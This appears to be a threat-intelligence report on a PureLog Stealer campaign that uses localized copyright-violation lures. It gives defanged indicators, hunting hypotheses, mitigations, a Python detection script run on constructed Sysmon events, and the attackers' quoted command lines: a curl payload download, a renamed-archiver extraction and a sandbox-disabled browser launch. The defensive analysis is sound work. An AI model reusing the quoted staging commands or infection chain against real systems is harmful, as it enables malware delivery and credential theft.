Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries
A targeted campaign is delivering the PureLog Stealer via localized copyright violation lures. The attack employs a sophisticated multi-stage infection chain, utilizing a Python-based loader to bypass AMSI, establish registry persistence, and execute the final .NET stealer entirely in memory to evade detection.
Authors: Mohamed Fahmy, Allixon Kristoffer Francisco, Jonna Santos
Source: Trend Micro
- domain: logs[.]bestshopingday[.]com - Domain strongly associated with PureLog Stealer C2
- domain: quickdocshare[.]com - Payload and decryption key hosting infrastructure
- sha256: 1539dab6099d860add8330bf2a008a4b6dc05c71f7b4439aebf431e034e5b6ff - Notice of Alleged Violation of Intellectual Property Rights.exe (Initial Lure)
- sha256: 35efc4b75a1d70c38513b4dfe549da417aaa476bf7e9ebd00265aaa8c7295870 - Malicious ZIP lure containing the initial executable
Key Takeaways
- The PureLog stealer campaign uses highly targeted, language-matched copyright violation lures to trick victims.
- A multi-stage delivery chain uses encrypted payloads and remote key retrieval to evade static analysis.
- The malware relies on a Python-based loader and dual .NET loaders for fileless, in-memory execution.
- The loader integrates AMSI bypass, registry persistence, screenshot capture, and victim fingerprinting.
- Targeted organizations are primarily in the healthcare, government, hospitality, and education sectors.
Affected Systems
- Windows OS (specifically Windows 11 64-bit noted in telemetry)
- Google Chrome
- Microsoft Edge
Attack Chain
The attack begins when a user executes a malicious executable disguised as a localized copyright violation notice. This executable opens a decoy PDF while silently downloading an encrypted payload and its decryption key from a remote server using curl with a custom User-Agent. A renamed WinRAR utility extracts the payload, which includes a Python interpreter renamed as svchost.exe and an obfuscated Python script named instructions.pdf. The Python script bypasses AMSI, establishes registry persistence, gathers system information, and reflectively loads dual .NET loaders that execute the final PureLog Stealer payload entirely in memory.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: Yes
- Platforms: TrendAI Vision One
The article mentions a TrendAI Vision One detection model for 'Executable Download via Google Ads Malvertising' and provides a Vision One hunting query for PureLog Stealer artifacts.
Detection Engineering Assessment
- EDR Visibility: High. The attack generates significant process creation events (cmd, curl, renamed executables), registry modifications, and PowerShell execution that EDRs can easily capture.
- Network Visibility: Medium. While the C2 traffic is HTTPS, the highly anomalous User-Agent ('curl/meow_meow') and direct IP connections provide strong network detection opportunities.
- Detection Difficulty: Moderate. The fileless execution and AMSI bypass make static detection difficult, but the noisy staging process (curl, renamed WinRAR, svchost in the Public folder) provides clear behavioral indicators.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon 1)
- Registry Events (Sysmon 12/13/14)
- PowerShell Operational Logs (Event ID 4104)
- Network Connections (Sysmon 3)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for curl.exe executions utilizing anomalous or custom User-Agent strings, specifically 'curl/meow_meow'. | Process Creation, Command Line | Command and Control / Payload Delivery | Low |
| Identify executions of svchost.exe originating from non-standard directories like C:\Users\Public\Windows. | Process Creation | Execution | Low |
| Detect archive extraction utilities (like WinRAR) executing with a .png extension to extract files. | Process Creation, Command Line | Defense Evasion / Extraction | Low |
| Monitor for PowerShell commands querying the SecurityCenter2 WMI namespace for AntivirusProduct. | Process Creation, PowerShell Logs | Discovery | Medium |
| Look for registry modifications to HKCU\Software\Microsoft\Windows\CurrentVersion\Run setting the value 'SystemSettings' to a command line execution. | Registry Events | Persistence | Low |
Control Gaps
- Static AV scanning (bypassed via fileless execution and AMSI patching)
- Network inspection (bypassed via HTTPS and encrypted payloads)
Key Behavioral Indicators
- svchost.exe executing in C:\Users\Public\Windows\
- curl.exe with -A 'curl/meow_meow'
- WinRAR renamed to .png
- instructions.pdf passed as an argument to an executable
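The hunting hypotheses table and the behavioral indicators above are stated as rules; the following Python script, added here as an example and not code or a query from Trend Micro, implements them as detection logic over Sysmon-style process creation (Event 1) and registry value set (Event 13) records. The sample events are constructed from the command lines reported for the campaign; full paths, the user SID and the archive password are placeholders. The curl rule generalizes the hypothesis slightly: it flags any -A value that does not match curl's default 'curl/<version>' form, so 'curl/meow_meow' is one instance of what it catches.

```python
"""Detection logic for the PureLog Stealer staging behaviours listed in the
hunting hypotheses and key behavioral indicators, run over constructed
Sysmon-style events. Added example; not Trend Micro's code or query."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int            # Sysmon 1 = process creation, 13 = registry value set
    image: str = ""          # Sysmon Image (full process path)
    command_line: str = ""   # Sysmon CommandLine
    target_object: str = ""  # Sysmon TargetObject (registry value path, event 13)


# Legitimate locations of svchost.exe; anything else matches the renamed-interpreter pattern
LEGIT_SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Extensions a PE image normally carries; a running image ending in .png etc. is a masquerade
EXEC_EXTS = {".exe", ".com", ".scr"}
# curl's default User-Agent is 'curl/<version>'; any other -A value is custom
DEFAULT_CURL_UA = re.compile(r"^curl/\d+\.\d+(\.\d+)?$")
RUN_KEY_SUFFIX = r"\software\microsoft\windows\currentversion\run\systemsettings"


def _split_path(path):
    """Lower-cased (directory, basename) of a Windows path."""
    directory, _, basename = path.replace("/", "\\").lower().rpartition("\\")
    return directory, basename


def _argv(command_line):
    """Tokenise a Windows command line, keeping quoted spans together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def detect(ev):
    """Return (rule, ATT&CK stage) pairs that fire on a single event."""
    hits = []
    if ev.event_id == 1:
        directory, basename = _split_path(ev.image)
        argv = _argv(ev.command_line)
        ext = "." + basename.rpartition(".")[2] if "." in basename else ""
        # H1: curl.exe with a custom User-Agent (campaign value: 'curl/meow_meow')
        if basename == "curl.exe":
            for i, arg in enumerate(argv[:-1]):
                if arg in ("-A", "--user-agent") and not DEFAULT_CURL_UA.match(argv[i + 1]):
                    hits.append(("curl_custom_user_agent", "Command and Control / Payload Delivery"))
        # H2: svchost.exe outside System32/SysWOW64 (renamed Python interpreter)
        if basename == "svchost.exe" and directory not in LEGIT_SVCHOST_DIRS:
            hits.append(("svchost_nonstandard_path", "Execution"))
        # H3: non-executable image extension running WinRAR's extract verb with a password switch
        if ext not in EXEC_EXTS and len(argv) >= 3 and argv[1] == "x" \
                and any(a.startswith("-p") for a in argv[2:]):
            hits.append(("renamed_archiver_extract", "Defense Evasion / Extraction"))
        # H4: PowerShell enumerating AV products via root\SecurityCenter2 (Medium FP risk)
        lowered = ev.command_line.lower()
        if basename in ("powershell.exe", "pwsh.exe") and "securitycenter2" in lowered \
                and "antivirusproduct" in lowered:
            hits.append(("powershell_av_discovery", "Discovery"))
        # KBI: a file named instructions.pdf passed as an argument to an executable
        if any(a.lower().endswith("instructions.pdf") for a in argv[1:]):
            hits.append(("pdf_named_script_argument", "Execution"))
    elif ev.event_id == 13 and ev.target_object.lower().endswith(RUN_KEY_SUFFIX):
        # H5: Run-key value 'SystemSettings' written (persistence for the Python loader)
        hits.append(("run_key_systemsettings", "Persistence"))
    return hits


def scan(events):
    """Run every rule over a list of events; returns (event index, rule, stage) tuples."""
    return [(i, rule, stage) for i, ev in enumerate(events) for rule, stage in detect(ev)]


# Constructed sample telemetry modelled on the command lines reported for the campaign.
# Full paths, the SID and the archive password are placeholders, not values from the report.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\curl.exe",
          'curl -A "curl/meow_meow" -s -k -L hxxps://quickdocshare[.]com/DQ'),
    Event(1, r"C:\Users\Public\_\FILE_2025년_재직증명서_원본.png",
          r'".\_\FILE_2025년_재직증명서_원본.png" x -p"PASSWORD_PLACEHOLDER" ".\_\invoice.pdf" "C:\Users\Public\" -y'),
    Event(1, r"C:\Users\Public\Windows\svchost.exe",
          r'"C:\Users\Public\Windows\svchost.exe" "instructions.pdf"'),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'powershell.exe -Command "Get-WmiObject -Namespace root\SecurityCenter2 -Class AntivirusProduct"'),
    Event(13, target_object=r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\SystemSettings"),
    # Benign controls: the real svchost.exe, and curl with its default User-Agent
    Event(1, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    Event(1, r"C:\Windows\System32\curl.exe", 'curl -A "curl/8.4.0" -s https://example.com/'),
]

if __name__ == "__main__":
    for idx, rule, stage in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} [{stage}]")
```

The two benign control events produce no hits, which is the low false-positive property the assessment above claims for these indicators; the SecurityCenter2 rule is the one to tune, since administrative inventory scripts also query that namespace.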
False Positive Assessment
- Low. The combination of renamed executables (svchost.exe for Python, .png for WinRAR), custom User-Agents, and specific directory paths (C:\Users\Public\Windows) is highly specific to this campaign and unlikely to occur in benign environments.
Recommendations
Immediate Mitigation
- Block known C2 IPs and domains associated with PureLog Stealer.
- Search endpoint telemetry for svchost.exe executing from C:\Users\Public\Windows.
- Isolate hosts exhibiting the identified curl.exe or renamed WinRAR behaviors.
Infrastructure Hardening
- Restrict the execution of curl.exe and other LOLBins unless explicitly required by administrative processes.
- Implement application control to prevent execution from C:\Users\Public\ and its subdirectories.
User Protection
- Deploy EDR solutions capable of detecting in-memory reflective loading and AMSI patching.
- Ensure web browsers are updated and hardened against malicious extensions and sandbox escapes.
Security Awareness
- Train employees to recognize localized phishing lures, especially those disguised as legal or copyright violation notices.
- Emphasize the danger of executing unexpected files downloaded from the internet, even if they appear as documents.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1036.003 - Masquerading: Rename System Utilities
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1140 - Deobfuscate/Decode Files or Information
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1055 - Process Injection
- T1113 - Screen Capture
- T1518.001 - Software Discovery: Security Software Discovery
- T1620 - Reflective Code Loading
Additional IOCs
- IPs:
  - 172[.]64[.]80[.]1 - Outbound connection observed during infection chain (Cloudflare)
  - 64[.]40[.]154[.]96 - Outbound connection observed during infection chain (Tier.Net Technologies LLC)
- Domains:
  - dq[.]bestshoppingday[.]com - Domain associated with the campaign infrastructure
  - mh[.]bestshopingday[.]com - Domain associated with the campaign infrastructure
  - logs[.]bestsaleshoppingday[.]com - Domain associated with the campaign infrastructure
  - cdn[.]eideasrl[.]it - Source URL domain for the malicious ZIP lure
- URLs:
  - hxxps://quickdocshare[.]com/DQ - URL used to download the encrypted payload (_invoice.pdf)
  - hxxps://quickdocshare[.]com/DQ/key - URL used to remotely retrieve the decryption password
  - hxxps://cdn[.]eideasrl[.]it/Notice%20of%20Alleged%20Violation%20of%20Intellectual%20Property%20Rights_1770380091603.zip - Download URL for the malicious ZIP lure
- File Hashes:
  - ac591adea9a2305f9be6ae430996afd9b7432116f381b638014a0886a99c6287 (SHA256) - urlmon.dll (shellcode loader)
  - f4532fc1e5d53a732fcc883f7125ceb06b985048 (SHA1) - svchost.exe (renamed python.exe)
- Registry Keys:
  - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemSettings - Registry key used for persistence by the Python loader
  - AppModel\StateRepository\CacheVersion - Registry key used as a state flag to prevent duplicate C2 exfiltration
- File Paths:
  - C:\Users\Public\Windows\svchost.exe - Path to the renamed Python interpreter
  - C:\Users\Public\Windows\instructions.pdf - Path to the obfuscated Python loader script
  - .\_\invoice.pdf - Path to the downloaded encrypted payload container
  - .\_\FILE_2025년_재직증명서_원본.png - Path to the renamed WinRAR executable used for extraction
  - .\_\document.pdf - Path to the decoy PDF document
- Command Lines:
  - Purpose: Download encrypted payload using a custom User-Agent | Tools: curl.exe | Stage: Payload Delivery | Command line: curl -A "curl/meow_meow" -s -k -L
  - Purpose: Extract encrypted payload using a renamed WinRAR executable and a dynamically retrieved password | Tools: WinRAR, cmd.exe | Stage: Extraction / Defense Evasion | Command line: x -p"%i" ".\_\invoice.pdf" "C:\Users\Public\" -y
  - Purpose: Execute the obfuscated Python loader script using a renamed Python interpreter | Tools: python.exe | Stage: Execution | Command line: "C:\Users\Public\Windows\svchost.exe" "instructions.pdf"
  - Purpose: Enumerate installed Antivirus products via WMI | Tools: powershell.exe, WMI | Stage: Discovery
  - Purpose: Launch Chrome/Edge as a renderer process with sandbox disabled for evasion | Tools: chrome.exe, msedge.exe | Stage: Defense Evasion / Process Injection | Command line: --type=renderer --extension-process --no-sandbox
- Other:
  - curl/meow_meow - Custom User-Agent string used by curl during payload download
  - Dgrfauysx.exe - Stage 1 .NET loader executed in memory
  - Fsywsuac.exe - Stage 1 .NET loader executed in memory (redundancy path)